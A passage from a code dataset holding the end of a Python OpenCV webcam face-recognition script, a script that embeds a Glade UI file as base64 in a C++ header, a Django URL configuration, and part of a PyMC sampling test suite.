OpenCV2: remove '.face' \n\tmodel = cv2.face.LBPHFaceRecognizer_create() \n\tmodel.train(images, lables) \n\t \n\twhile True: \n\t (_, img) = webcam.read() \n\t gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) \n\t faces = face_cascade.detectMultiScale(gray, scaleFactor=1.3, minNeighbors=5) \n\t for (x, y, w, h) in faces: \n\t cv2.rectangle(img, (x, y), (x + w, y + h), (255, 0, 0), 2) \n\t face = gray[y:y + h, x:x + w] \n\t face_resize = cv2.resize(face, (width, height)) \n\t # Try to recognize the face \n\t prediction = model.predict(face_resize) \n\t cv2.rectangle(img, (x, y), (x + w, y + h), (0, 255, 0), 3) \n\t \n\t if prediction[1]<500: \n\t \tcv2.putText(img, '% s - %.0f' % (names[prediction[0]], prediction[1]), (x-10, y-10), cv2.FONT_HERSHEY_PLAIN, 1.5, (255, 0, 0)) \n\t else:\n\t \tcv2.putText(img, 'not recognized', (x-10, y-10), cv2.FONT_HERSHEY_PLAIN, 1, (0, 255, 0)) \n\t \n\t cv2.imshow('OpenCV', img)\n\t if cv2.waitKey(20) & 0xFF == ord('q'):\n\t \tbreak\n\n\t# When everything done, release the capture\n\twebcam.release()\n\tcv2.destroyAllWindows()\n\ndef runOpenface():\n\t## RUN THE OPENFACE:\n\tos.system('/home/varat/OpenFace/build/bin/FeatureExtraction -verbose -device /dev/video0')\n\t\nif __name__ == '__main__':\n\tcase = raw_input(\"Choose? 1:Caputure Photo and Train Model; 2:Face Recognition; 3:Run OpenFace? \")\n\tprint('Please press\"q\" to close the webcam')\n\tprint('It is build with Python 2 version')\n\tif (case == '1'):\n\t\tcapture_train()\n\tif (case == '2'):\n\t\tface_recognizer()\n\tif (case == '3'):\n\t\trunOpenface();\n\telse:\n\t\tprint('Choose one of the choice: 0, 1 or 2')\n","sub_path":"facialDetect.py","file_name":"facialDetect.py","file_ext":"py","file_size_in_byte":3939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"170052364","text":"################################################################################\n# Copyright 2015 Martin Grap\n# \n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n################################################################################\n\n## @package make_glade_header C++ code generator written in python3 that encapsulates the glade\n# file in a C++ header file\n# \n# Code generator that transforms the glade file needed by this software into a base64 encoded\n# string that can be included through a header file. This saves us from the trouble of locating the \n# rotor_dialog_2.ui file during runtime. \n# usage: make_glade_header.py glade_file_name output_file_name\n#\n# \\file make_glade_header.py\n# \\brief Code generator that transforms the glade file needed by this software into a base64 encoded\n# string that can be included through a header file. This saves us from the trouble of locating the \n# rotor_dialog_2.ui file during runtime.\n\nimport base64\nimport sys\n\nLINE_LENGTH = 72\n\ndef make_glade_data(file_name, file_name_out):\n f = open(file_name, 'rb')\n raw = f.read()\n f.close()\n \n b64data = base64.standard_b64encode(raw).decode()\n \n f = open(file_name_out, 'w')\n f.write('#include\\r\\n\\r\\n')\n f.write('//base64 encoded glade data. base64 encoding is less efficient but also less error prone\\r\\n')\n f.write('//than quoting all the special characters in the XML input \\r\\n') \n f.write('static const string gladedata(\"\\\\\\r\\n')\n \n chunk_start = 0;\n \n while chunk_start < len(b64data):\n\n block_length = LINE_LENGTH\n end_char = '\\\\' \n if (len(b64data) - chunk_start) < LINE_LENGTH:\n block_length = len(b64data) - chunk_start\n\n f.write(b64data[chunk_start:chunk_start + block_length] + end_char + '\\r\\n')\n chunk_start += block_length\n \n f.write('\");\\r\\n')\n f.close()\n\n\nif len(sys.argv) < 3:\n print(\"usage: make_glade_header.py \")\n sys.exit()\n\nmake_glade_data(sys.argv[1], sys.argv[2])\n","sub_path":"make_glade_header.py","file_name":"make_glade_header.py","file_ext":"py","file_size_in_byte":2602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"636503058","text":"from django.urls import path\nfrom .views import (IndexTemplateView, AboutTemplateView, ServiceTemplateView,\n CasesTemplateView,BlogTemplateView, ContactTemplateView, SingelBlogPost,\n CategoryBaseWork, search, TermsConditionView, PrivacyAndPolicyView, RefundPolicyView, ServicePriceDetail)\n\nurlpatterns = [\n path('', IndexTemplateView, name=\"index\"),\n path('about', AboutTemplateView.as_view(), name=\"about\"),\n path('service', ServiceTemplateView.as_view(), name=\"service\"),\n path('cases', CasesTemplateView.as_view(), name=\"cases\"),\n path('blog', BlogTemplateView.as_view(), name=\"blog\"),\n path('contact', ContactTemplateView, name=\"contact\"),\n path('post/', SingelBlogPost.as_view(), name=\"blog-singel\"),\n path('service-page/', CategoryBaseWork, name=\"service_item\"),\n path('search', search, name=\"search\"),\n path('terms-and-condition', TermsConditionView.as_view(), name=\"terms_condition_view\"),\n path('privacy-and-policy', PrivacyAndPolicyView.as_view(), name=\"privacy_and_policy\"),\n path('refound-policy', RefundPolicyView.as_view(), name=\"refound_policy\"),\n path('order/', ServicePriceDetail, name=\"order\")\n]\n","sub_path":"base_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"420836975","text":"# Copyright 2020 The PyMC Developers\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport re\nimport unittest.mock as mock\n\nfrom contextlib import ExitStack as does_not_raise\nfrom typing import Tuple\n\nimport aesara\nimport aesara.tensor as at\nimport numpy as np\nimport numpy.testing as npt\nimport pytest\nimport scipy.special\nimport xarray as xr\n\nfrom aesara import Mode, shared\nfrom aesara.compile import SharedVariable\nfrom arviz import InferenceData\nfrom arviz import from_dict as az_from_dict\nfrom arviz.tests.helpers import check_multiple_attrs\nfrom scipy import stats\n\nimport pymc as pm\n\nfrom pymc.aesaraf import compile_pymc\nfrom pymc.backends.base import MultiTrace\nfrom pymc.backends.ndarray import NDArray\nfrom pymc.exceptions import IncorrectArgumentsError, SamplingError\nfrom pymc.sampling import _get_seeds_per_chain, compile_forward_sampling_function\nfrom pymc.tests.helpers import SeededTest, fast_unstable_sampling_mode\nfrom pymc.tests.models import simple_init\n\n\nclass TestInitNuts(SeededTest):\n def setup_method(self):\n super().setup_method()\n self.model, self.start, self.step, _ = simple_init()\n\n def test_checks_seeds_kwarg(self):\n with self.model:\n with pytest.raises(ValueError, match=\"Number of seeds\"):\n pm.sampling.init_nuts(chains=2, random_seed=[1])\n\n\nclass TestSample(SeededTest):\n def setup_method(self):\n super().setup_method()\n self.model, self.start, self.step, _ = simple_init()\n\n @pytest.mark.parametrize(\"init\", (\"jitter+adapt_diag\", \"advi\", \"map\"))\n @pytest.mark.parametrize(\"cores\", (1, 2))\n @pytest.mark.parametrize(\n \"chains, seeds\",\n [\n (1, None),\n (1, 1),\n (1, [1]),\n (2, None),\n (2, 1),\n (2, [1, 2]),\n ],\n )\n def test_random_seed(self, chains, seeds, cores, init):\n with pm.Model():\n x = pm.Normal(\"x\", 0, 10, initval=\"prior\")\n tr1 = pm.sample(\n chains=chains,\n random_seed=seeds,\n cores=cores,\n init=init,\n tune=0,\n draws=10,\n return_inferencedata=False,\n compute_convergence_checks=False,\n )\n tr2 = pm.sample(\n chains=chains,\n random_seed=seeds,\n cores=cores,\n init=init,\n tune=0,\n draws=10,\n return_inferencedata=False,\n compute_convergence_checks=False,\n )\n\n allequal = np.all(tr1[\"x\"] == tr2[\"x\"])\n if seeds is None:\n assert not allequal\n else:\n assert allequal\n\n @mock.patch(\"numpy.random.seed\")\n def test_default_sample_does_not_set_global_seed(self, mocked_seed):\n # Test that when random_seed is None, `np.random.seed` is not called in the main\n # process. Ideally it would never be called, but PyMC step samplers still rely\n # on global seeding for reproducible behavior.\n kwargs = dict(tune=2, draws=2, random_seed=None)\n with self.model:\n pm.sample(chains=1, **kwargs)\n pm.sample(chains=2, cores=1, **kwargs)\n pm.sample(chains=2, cores=2, **kwargs)\n mocked_seed.assert_not_called()\n\n def test_sample_does_not_rely_on_external_global_seeding(self):\n # Tests that sampling does not depend on exertenal global seeding\n kwargs = dict(\n tune=2,\n draws=20,\n random_seed=None,\n return_inferencedata=False,\n )\n with self.model:\n np.random.seed(1)\n idata11 = pm.sample(chains=1, **kwargs)\n np.random.seed(1)\n idata12 = pm.sample(chains=2, cores=1, **kwargs)\n np.random.seed(1)\n idata13 = pm.sample(chains=2, cores=2, **kwargs)\n\n np.random.seed(1)\n idata21 = pm.sample(chains=1, **kwargs)\n np.random.seed(1)\n idata22 = pm.sample(chains=2, cores=1, **kwargs)\n np.random.seed(1)\n idata23 = pm.sample(chains=2, cores=2, **kwargs)\n\n assert np.all(idata11[\"x\"] != idata21[\"x\"])\n assert np.all(idata12[\"x\"] != idata22[\"x\"])\n assert np.all(idata13[\"x\"] != idata23[\"x\"])\n\n def test_sample(self):\n test_cores = [1]\n with self.model:\n for cores in test_cores:\n for steps in [1, 10, 300]:\n pm.sample(\n steps,\n tune=0,\n step=self.step,\n cores=cores,\n random_seed=self.random_seed,\n )\n\n def test_sample_init(self):\n with self.model:\n for init in (\n \"advi\",\n \"advi_map\",\n \"map\",\n \"adapt_diag\",\n \"jitter+adapt_diag\",\n \"jitter+adapt_diag_grad\",\n \"adapt_full\",\n \"jitter+adapt_full\",\n ):\n pm.sample(\n init=init,\n tune=120,\n n_init=1000,\n draws=50,\n random_seed=self.random_seed,\n )\n\n def test_sample_args(self):\n with self.model:\n with pytest.raises(ValueError) as excinfo:\n pm.sample(50, tune=0, foo=1)\n assert \"'foo'\" in str(excinfo.value)\n\n with pytest.raises(ValueError) as excinfo:\n pm.sample(50, tune=0, foo={})\n assert \"foo\" in str(excinfo.value)\n\n def test_iter_sample(self):\n with self.model:\n samps = pm.sampling.iter_sample(\n draws=5,\n step=self.step,\n start=self.start,\n tune=0,\n random_seed=self.random_seed,\n )\n for i, trace in enumerate(samps):\n assert i == len(trace) - 1, \"Trace does not have correct length.\"\n\n def test_parallel_start(self):\n with self.model:\n idata = pm.sample(\n 0,\n tune=5,\n cores=2,\n discard_tuned_samples=False,\n start=[{\"x\": [10, 10]}, {\"x\": [-10, -10]}],\n random_seed=self.random_seed,\n )\n assert idata.warmup_posterior[\"x\"].sel(chain=0, draw=0).values[0] > 0\n assert idata.warmup_posterior[\"x\"].sel(chain=1, draw=0).values[0] < 0\n\n def test_sample_tune_len(self):\n with self.model:\n trace = pm.sample(draws=100, tune=50, cores=1, return_inferencedata=False)\n assert len(trace) == 100\n trace = pm.sample(\n draws=100, tune=50, cores=1, return_inferencedata=False, discard_tuned_samples=False\n )\n assert len(trace) == 150\n trace = pm.sample(draws=100, tune=50, cores=4, return_inferencedata=False)\n assert len(trace) == 100\n\n def test_reset_tuning(self):\n with self.model:\n tune = 50\n chains = 2\n start, step = pm.sampling.init_nuts(chains=chains, random_seed=[1, 2])\n pm.sample(draws=2, tune=tune, chains=chains, step=step, start=start, cores=1)\n assert step.potential._n_samples == tune\n assert step.step_adapt._count == tune + 1\n\n @pytest.mark.parametrize(\"step_cls\", [pm.NUTS, pm.Metropolis, pm.Slice])\n @pytest.mark.parametrize(\"discard\", [True, False])\n def test_trace_report(self, step_cls, discard):\n with self.model:\n # add more variables, because stats are 2D with CompoundStep!\n pm.Uniform(\"uni\")\n trace = pm.sample(\n draws=100,\n tune=50,\n cores=1,\n discard_tuned_samples=discard,\n step=step_cls(),\n compute_convergence_checks=False,\n return_inferencedata=False,\n )\n assert trace.report.n_tune == 50\n assert trace.report.n_draws == 100\n assert isinstance(trace.report.t_sampling, float)\n\n def test_return_inferencedata(self):\n with self.model:\n kwargs = dict(draws=100, tune=50, cores=1, chains=2, step=pm.Metropolis())\n\n # trace with tuning\n with pytest.warns(UserWarning, match=\"will be included\"):\n result = pm.sample(\n **kwargs, return_inferencedata=False, discard_tuned_samples=False\n )\n assert isinstance(result, pm.backends.base.MultiTrace)\n assert len(result) == 150\n\n # inferencedata with tuning\n result = pm.sample(**kwargs, return_inferencedata=True, discard_tuned_samples=False)\n assert isinstance(result, InferenceData)\n assert result.posterior.sizes[\"draw\"] == 100\n assert result.posterior.sizes[\"chain\"] == 2\n assert len(result._groups_warmup) > 0\n\n # inferencedata without tuning, with idata_kwargs\n prior = pm.sample_prior_predictive(return_inferencedata=False)\n result = pm.sample(\n **kwargs,\n return_inferencedata=True,\n discard_tuned_samples=True,\n idata_kwargs={\"prior\": prior},\n random_seed=-1,\n )\n assert \"prior\" in result\n assert isinstance(result, InferenceData)\n assert result.posterior.sizes[\"draw\"] == 100\n assert result.posterior.sizes[\"chain\"] == 2\n assert len(result._groups_warmup) == 0\n\n @pytest.mark.parametrize(\"cores\", [1, 2])\n def test_sampler_stat_tune(self, cores):\n with self.model:\n tune_stat = pm.sample(\n tune=5,\n draws=7,\n cores=cores,\n discard_tuned_samples=False,\n return_inferencedata=False,\n step=pm.Metropolis(),\n ).get_sampler_stats(\"tune\", chains=1)\n assert list(tune_stat).count(True) == 5\n assert list(tune_stat).count(False) == 7\n\n @pytest.mark.parametrize(\n \"start, error\",\n [\n ({\"x\": 1}, ValueError),\n ({\"x\": [1, 2, 3]}, ValueError),\n ({\"x\": np.array([[1, 1], [1, 1]])}, ValueError),\n ],\n )\n def test_sample_start_bad_shape(self, start, error):\n with pytest.raises(error):\n pm.sampling._check_start_shape(self.model, start)\n\n @pytest.mark.parametrize(\"start\", [{\"x\": np.array([1, 1])}, {\"x\": [10, 10]}, {\"x\": [-10, -10]}])\n def test_sample_start_good_shape(self, start):\n pm.sampling._check_start_shape(self.model, start)\n\n def test_sample_callback(self):\n callback = mock.Mock()\n test_cores = [1, 2]\n test_chains = [1, 2]\n with self.model:\n for cores in test_cores:\n for chain in test_chains:\n pm.sample(\n 10,\n tune=0,\n chains=chain,\n step=self.step,\n cores=cores,\n random_seed=self.random_seed,\n callback=callback,\n )\n assert callback.called\n\n def test_callback_can_cancel(self):\n trace_cancel_length = 5\n\n def callback(trace, draw):\n if len(trace) >= trace_cancel_length:\n raise KeyboardInterrupt()\n\n with self.model:\n trace = pm.sample(\n 10,\n tune=0,\n chains=1,\n step=self.step,\n cores=1,\n random_seed=self.random_seed,\n callback=callback,\n return_inferencedata=False,\n )\n assert len(trace) == trace_cancel_length\n\n def test_sequential_backend(self):\n with self.model:\n backend = NDArray()\n pm.sample(10, cores=1, chains=2, trace=backend)\n\n def test_exceptions(self):\n # Test iteration over MultiTrace NotImplementedError\n with pm.Model() as model:\n mu = pm.Normal(\"mu\", 0.0, 1.0)\n a = pm.Normal(\"a\", mu=mu, sigma=1, observed=np.array([0.5, 0.2]))\n trace = pm.sample(tune=0, draws=10, chains=2, return_inferencedata=False)\n with pytest.raises(NotImplementedError):\n xvars = [t[\"mu\"] for t in trace]\n\n def test_deterministic_of_unobserved(self):\n with pm.Model() as model:\n x = pm.HalfNormal(\"x\", 1)\n y = pm.Deterministic(\"y\", x + 100)\n idata = pm.sample(\n chains=1,\n tune=10,\n draws=50,\n compute_convergence_checks=False,\n )\n\n np.testing.assert_allclose(idata.posterior[\"y\"], idata.posterior[\"x\"] + 100)\n\n def test_transform_with_rv_dependency(self):\n # Test that untransformed variables that depend on upstream variables are properly handled\n with pm.Model() as m:\n x = pm.HalfNormal(\"x\", observed=1)\n transform = pm.distributions.transforms.Interval(\n bounds_fn=lambda *inputs: (inputs[-2], inputs[-1])\n )\n y = pm.Uniform(\"y\", lower=0, upper=x, transform=transform)\n trace = pm.sample(tune=10, draws=50, return_inferencedata=False, random_seed=336)\n\n assert np.allclose(scipy.special.expit(trace[\"y_interval__\"]), trace[\"y\"])\n\n\ndef test_sample_find_MAP_does_not_modify_start():\n # see https://github.com/pymc-devs/pymc/pull/4458\n with pm.Model():\n pm.LogNormal(\"untransformed\")\n\n # make sure find_Map does not modify the start dict\n start = {\"untransformed\": 2}\n pm.find_MAP(start=start)\n assert start == {\"untransformed\": 2}\n\n # make sure sample does not modify the start dict\n start = {\"untransformed\": 0.2}\n pm.sample(draws=10, step=pm.Metropolis(), tune=5, start=start, chains=3)\n assert start == {\"untransformed\": 0.2}\n\n # make sure sample does not modify the start when passes as list of dict\n start = [{\"untransformed\": 2}, {\"untransformed\": 0.2}]\n pm.sample(draws=10, step=pm.Metropolis(), tune=5, start=start, chains=2)\n assert start == [{\"untransformed\": 2}, {\"untransformed\": 0.2}]\n\n\ndef test_empty_model():\n with pm.Model():\n pm.Normal(\"a\", observed=1)\n with pytest.raises(SamplingError) as error:\n pm.sample()\n error.match(\"any free variables\")\n\n\ndef test_partial_trace_sample():\n with pm.Model() as model:\n a = pm.Normal(\"a\", mu=0, sigma=1)\n b = pm.Normal(\"b\", mu=0, sigma=1)\n idata = pm.sample(trace=[a])\n assert \"a\" in idata.posterior\n assert \"b\" not in idata.posterior\n\n\ndef test_chain_idx():\n # see https://github.com/pymc-devs/pymc/issues/4469\n with pm.Model():\n mu = pm.Normal(\"mu\")\n x = pm.Normal(\"x\", mu=mu, sigma=1, observed=np.asarray(3))\n # note draws-tune must be >100 AND we need an observed RV for this to properly\n # trigger convergence checks, which is one particular case in which this failed\n # before\n idata = pm.sample(draws=150, tune=10, chain_idx=1)\n\n ppc = pm.sample_posterior_predictive(idata)\n # TODO FIXME: Assert something.\n ppc = pm.sample_posterior_predictive(idata, keep_size=True)\n\n\n@pytest.mark.parametrize(\n \"n_points, tune, expected_length, expected_n_traces\",\n [\n ((5, 2, 2), 0, 2, 3),\n ((6, 1, 1), 1, 6, 1),\n ],\n)\ndef test_choose_chains(n_points, tune, expected_length, expected_n_traces):\n with pm.Model() as model:\n a = pm.Normal(\"a\", mu=0, sigma=1)\n trace_0 = NDArray(model)\n trace_1 = NDArray(model)\n trace_2 = NDArray(model)\n trace_0.setup(n_points[0], 1)\n trace_1.setup(n_points[1], 1)\n trace_2.setup(n_points[2], 1)\n for _ in range(n_points[0]):\n trace_0.record({\"a\": 0})\n for _ in range(n_points[1]):\n trace_1.record({\"a\": 0})\n for _ in range(n_points[2]):\n trace_2.record({\"a\": 0})\n traces, length = pm.sampling._choose_chains([trace_0, trace_1, trace_2], tune=tune)\n assert length == expected_length\n assert expected_n_traces == len(traces)\n\n\n@pytest.mark.xfail(condition=(aesara.config.floatX == \"float32\"), reason=\"Fails on float32\")\nclass TestNamedSampling(SeededTest):\n def test_shared_named(self):\n G_var = shared(value=np.atleast_2d(1.0), broadcastable=(True, False), name=\"G\")\n\n with pm.Model():\n theta0 = pm.Normal(\n \"theta0\",\n mu=np.atleast_2d(0),\n tau=np.atleast_2d(1e20),\n size=(1, 1),\n initval=np.atleast_2d(0),\n )\n theta = pm.Normal(\n \"theta\", mu=at.dot(G_var, theta0), tau=np.atleast_2d(1e20), size=(1, 1)\n )\n res = theta.eval()\n assert np.isclose(res, 0.0)\n\n def test_shared_unnamed(self):\n G_var = shared(value=np.atleast_2d(1.0), broadcastable=(True, False))\n with pm.Model():\n theta0 = pm.Normal(\n \"theta0\",\n mu=np.atleast_2d(0),\n tau=np.atleast_2d(1e20),\n size=(1, 1),\n initval=np.atleast_2d(0),\n )\n theta = pm.Normal(\n \"theta\", mu=at.dot(G_var, theta0), tau=np.atleast_2d(1e20), size=(1, 1)\n )\n res = theta.eval()\n assert np.isclose(res, 0.0)\n\n def test_constant_named(self):\n G_var = at.constant(np.atleast_2d(1.0), name=\"G\")\n with pm.Model():\n theta0 = pm.Normal(\n \"theta0\",\n mu=np.atleast_2d(0),\n tau=np.atleast_2d(1e20),\n size=(1, 1),\n initval=np.atleast_2d(0),\n )\n theta = pm.Normal(\n \"theta\", mu=at.dot(G_var, theta0), tau=np.atleast_2d(1e20), size=(1, 1)\n )\n\n res = theta.eval()\n assert np.isclose(res, 0.0)\n\n\nclass TestChooseBackend:\n def test_choose_backend_none(self):\n with mock.patch(\"pymc.sampling.NDArray\") as nd:\n pm.sampling._choose_backend(None)\n assert nd.called\n\n def test_choose_backend_list_of_variables(self):\n with mock.patch(\"pymc.sampling.NDArray\") as nd:\n pm.sampling._choose_backend([\"var1\", \"var2\"])\n nd.assert_called_with(vars=[\"var1\", \"var2\"])\n\n def test_errors_and_warnings(self):\n with pm.Model():\n A = pm.Normal(\"A\")\n B = pm.Uniform(\"B\")\n strace = pm.sampling.NDArray(vars=[A, B])\n strace.setup(10, 0)\n\n with pytest.raises(ValueError, match=\"from existing MultiTrace\"):\n pm.sampling._choose_backend(trace=MultiTrace([strace]))\n\n strace.record({\"A\": 2, \"B_interval__\": 0.1})\n assert len(strace) == 1\n with pytest.raises(ValueError, match=\"Continuation of traces\"):\n pm.sampling._choose_backend(trace=strace)\n\n\nclass TestSamplePPC(SeededTest):\n def test_normal_scalar(self):\n nchains = 2\n ndraws = 500\n with pm.Model() as model:\n mu = pm.Normal(\"mu\", 0.0, 1.0)\n a = pm.Normal(\"a\", mu=mu, sigma=1, observed=0.0)\n trace = pm.sample(\n draws=ndraws,\n chains=nchains,\n return_inferencedata=False,\n )\n\n with model:\n # test list input\n ppc0 = pm.sample_posterior_predictive(\n [model.initial_point()], samples=10, return_inferencedata=False\n )\n # # deprecated argument is not introduced to fast version [2019/08/20:rpg]\n ppc = pm.sample_posterior_predictive(trace, var_names=[\"a\"], return_inferencedata=False)\n # test empty ppc\n ppc = pm.sample_posterior_predictive(trace, var_names=[], return_inferencedata=False)\n assert len(ppc) == 0\n\n # test keep_size parameter\n ppc = pm.sample_posterior_predictive(trace, keep_size=True, return_inferencedata=False)\n assert ppc[\"a\"].shape == (nchains, ndraws)\n\n # test default case\n ppc = pm.sample_posterior_predictive(trace, var_names=[\"a\"], return_inferencedata=False)\n assert \"a\" in ppc\n assert ppc[\"a\"].shape == (nchains * ndraws,)\n # mu's standard deviation may have changed thanks to a's observed\n _, pval = stats.kstest(ppc[\"a\"] - trace[\"mu\"], stats.norm(loc=0, scale=1).cdf)\n assert pval > 0.001\n\n def test_normal_scalar_idata(self):\n nchains = 2\n ndraws = 500\n with pm.Model() as model:\n mu = pm.Normal(\"mu\", 0.0, 1.0)\n a = pm.Normal(\"a\", mu=mu, sigma=1, observed=0.0)\n trace = pm.sample(\n draws=ndraws,\n chains=nchains,\n return_inferencedata=False,\n discard_tuned_samples=False,\n )\n\n assert not isinstance(trace, InferenceData)\n\n with model:\n # test keep_size parameter and idata input\n idata = pm.to_inference_data(trace)\n assert isinstance(idata, InferenceData)\n\n ppc = pm.sample_posterior_predictive(idata, keep_size=True, return_inferencedata=False)\n assert ppc[\"a\"].shape == (nchains, ndraws)\n\n def test_normal_vector(self, caplog):\n with pm.Model() as model:\n mu = pm.Normal(\"mu\", 0.0, 1.0)\n a = pm.Normal(\"a\", mu=mu, sigma=1, observed=np.array([0.5, 0.2]))\n trace = pm.sample(return_inferencedata=False)\n\n with model:\n # test list input\n ppc0 = pm.sample_posterior_predictive(\n [model.initial_point()], return_inferencedata=False, samples=10\n )\n ppc = pm.sample_posterior_predictive(\n trace, return_inferencedata=False, samples=12, var_names=[]\n )\n assert len(ppc) == 0\n\n # test keep_size parameter\n ppc = pm.sample_posterior_predictive(trace, return_inferencedata=False, keep_size=True)\n assert ppc[\"a\"].shape == (trace.nchains, len(trace), 2)\n with pytest.warns(UserWarning):\n ppc = pm.sample_posterior_predictive(\n trace, return_inferencedata=False, samples=12, var_names=[\"a\"]\n )\n assert \"a\" in ppc\n assert ppc[\"a\"].shape == (12, 2)\n\n with pytest.warns(UserWarning):\n ppc = pm.sample_posterior_predictive(\n trace, return_inferencedata=False, samples=12, var_names=[\"a\"]\n )\n assert \"a\" in ppc\n assert ppc[\"a\"].shape == (12, 2)\n\n def test_normal_vector_idata(self, caplog):\n with pm.Model() as model:\n mu = pm.Normal(\"mu\", 0.0, 1.0)\n a = pm.Normal(\"a\", mu=mu, sigma=1, observed=np.array([0.5, 0.2]))\n trace = pm.sample(return_inferencedata=False)\n\n assert not isinstance(trace, InferenceData)\n\n with model:\n # test keep_size parameter with inference data as input...\n idata = pm.to_inference_data(trace)\n assert isinstance(idata, InferenceData)\n\n ppc = pm.sample_posterior_predictive(idata, return_inferencedata=False, keep_size=True)\n assert ppc[\"a\"].shape == (trace.nchains, len(trace), 2)\n\n def test_exceptions(self, caplog):\n with pm.Model() as model:\n mu = pm.Normal(\"mu\", 0.0, 1.0)\n a = pm.Normal(\"a\", mu=mu, sigma=1, observed=np.array([0.5, 0.2]))\n idata = pm.sample(idata_kwargs={\"log_likelihood\": False})\n\n with model:\n with pytest.raises(IncorrectArgumentsError):\n ppc = pm.sample_posterior_predictive(idata, samples=10, keep_size=True)\n\n # test wrong type argument\n bad_trace = {\"mu\": stats.norm.rvs(size=1000)}\n with pytest.raises(TypeError, match=\"type for `trace`\"):\n ppc = pm.sample_posterior_predictive(bad_trace)\n\n def test_vector_observed(self):\n with pm.Model() as model:\n mu = pm.Normal(\"mu\", mu=0, sigma=1)\n a = pm.Normal(\"a\", mu=mu, sigma=1, observed=np.array([0.0, 1.0]))\n idata = pm.sample(idata_kwargs={\"log_likelihood\": False})\n\n with model:\n # test list input\n # ppc0 = pm.sample_posterior_predictive([model.initial_point], samples=10)\n # TODO: Assert something about the output\n # ppc = pm.sample_posterior_predictive(idata, samples=12, var_names=[])\n # assert len(ppc) == 0\n ppc = pm.sample_posterior_predictive(\n idata, return_inferencedata=False, samples=12, var_names=[\"a\"]\n )\n assert \"a\" in ppc\n assert ppc[\"a\"].shape == (12, 2)\n\n def test_sum_normal(self):\n with pm.Model() as model:\n a = pm.Normal(\"a\", sigma=0.2)\n b = pm.Normal(\"b\", mu=a)\n idata = pm.sample()\n\n with model:\n # test list input\n ppc0 = pm.sample_posterior_predictive(\n [model.initial_point()], return_inferencedata=False, samples=10\n )\n assert ppc0 == {}\n ppc = pm.sample_posterior_predictive(\n idata, return_inferencedata=False, samples=1000, var_names=[\"b\"]\n )\n assert len(ppc) == 1\n assert ppc[\"b\"].shape == (1000,)\n scale = np.sqrt(1 + 0.2**2)\n _, pval = stats.kstest(ppc[\"b\"], stats.norm(scale=scale).cdf)\n assert pval > 0.001\n\n def test_model_not_drawable_prior(self):\n data = np.random.poisson(lam=10, size=200)\n model = pm.Model()\n with model:\n mu = pm.HalfFlat(\"sigma\")\n pm.Poisson(\"foo\", mu=mu, observed=data)\n with aesara.config.change_flags(mode=fast_unstable_sampling_mode):\n idata = pm.sample(tune=10, draws=40, chains=1)\n\n with model:\n with pytest.raises(NotImplementedError) as excinfo:\n pm.sample_prior_predictive(50)\n assert \"Cannot sample\" in str(excinfo.value)\n samples = pm.sample_posterior_predictive(idata, 40, return_inferencedata=False)\n assert samples[\"foo\"].shape == (40, 200)\n\n def test_model_shared_variable(self):\n rng = np.random.RandomState(9832)\n\n x = rng.randn(100)\n y = x > 0\n x_shared = aesara.shared(x)\n y_shared = aesara.shared(y)\n with pm.Model() as model:\n coeff = pm.Normal(\"x\", mu=0, sigma=1)\n logistic = pm.Deterministic(\"p\", pm.math.sigmoid(coeff * x_shared))\n\n obs = pm.Bernoulli(\"obs\", p=logistic, observed=y_shared)\n trace = pm.sample(\n 100, return_inferencedata=False, compute_convergence_checks=False, random_seed=rng\n )\n\n x_shared.set_value([-1, 0, 1.0])\n y_shared.set_value([0, 0, 0])\n\n samples = 100\n with model:\n post_pred = pm.sample_posterior_predictive(\n trace, return_inferencedata=False, samples=samples, var_names=[\"p\", \"obs\"]\n )\n\n expected_p = np.array([logistic.eval({coeff: val}) for val in trace[\"x\"][:samples]])\n assert post_pred[\"obs\"].shape == (samples, 3)\n npt.assert_allclose(post_pred[\"p\"], expected_p)\n\n def test_deterministic_of_observed(self):\n rng = np.random.RandomState(8442)\n\n meas_in_1 = pm.aesaraf.floatX(2 + 4 * rng.randn(10))\n meas_in_2 = pm.aesaraf.floatX(5 + 4 * rng.randn(10))\n nchains = 2\n with pm.Model() as model:\n mu_in_1 = pm.Normal(\"mu_in_1\", 0, 2)\n sigma_in_1 = pm.HalfNormal(\"sd_in_1\", 1)\n mu_in_2 = pm.Normal(\"mu_in_2\", 0, 2)\n sigma_in_2 = pm.HalfNormal(\"sd__in_2\", 1)\n\n in_1 = pm.Normal(\"in_1\", mu_in_1, sigma_in_1, observed=meas_in_1)\n in_2 = pm.Normal(\"in_2\", mu_in_2, sigma_in_2, observed=meas_in_2)\n out_diff = in_1 + in_2\n pm.Deterministic(\"out\", out_diff)\n\n with aesara.config.change_flags(mode=fast_unstable_sampling_mode):\n trace = pm.sample(\n tune=100,\n draws=100,\n chains=nchains,\n step=pm.Metropolis(),\n return_inferencedata=False,\n compute_convergence_checks=False,\n random_seed=rng,\n )\n\n rtol = 1e-5 if aesara.config.floatX == \"float64\" else 1e-4\n\n ppc = pm.sample_posterior_predictive(\n return_inferencedata=False,\n model=model,\n trace=trace,\n samples=len(trace) * nchains,\n random_seed=0,\n var_names=[var.name for var in (model.deterministics + model.basic_RVs)],\n )\n\n npt.assert_allclose(ppc[\"in_1\"] + ppc[\"in_2\"], ppc[\"out\"], rtol=rtol)\n\n def test_deterministic_of_observed_modified_interface(self):\n rng = np.random.RandomState(4982)\n\n meas_in_1 = pm.aesaraf.floatX(2 + 4 * 